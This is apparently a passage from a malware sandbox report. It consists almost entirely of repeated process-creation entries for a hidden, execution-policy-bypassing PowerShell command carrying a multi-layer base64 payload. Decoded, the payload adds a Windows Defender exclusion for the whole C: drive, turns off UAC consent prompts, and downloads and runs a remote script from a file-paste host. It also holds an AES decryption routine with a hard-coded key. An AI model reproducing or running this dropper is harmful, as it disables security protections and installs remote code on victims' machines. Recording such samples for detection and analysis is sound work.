UFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU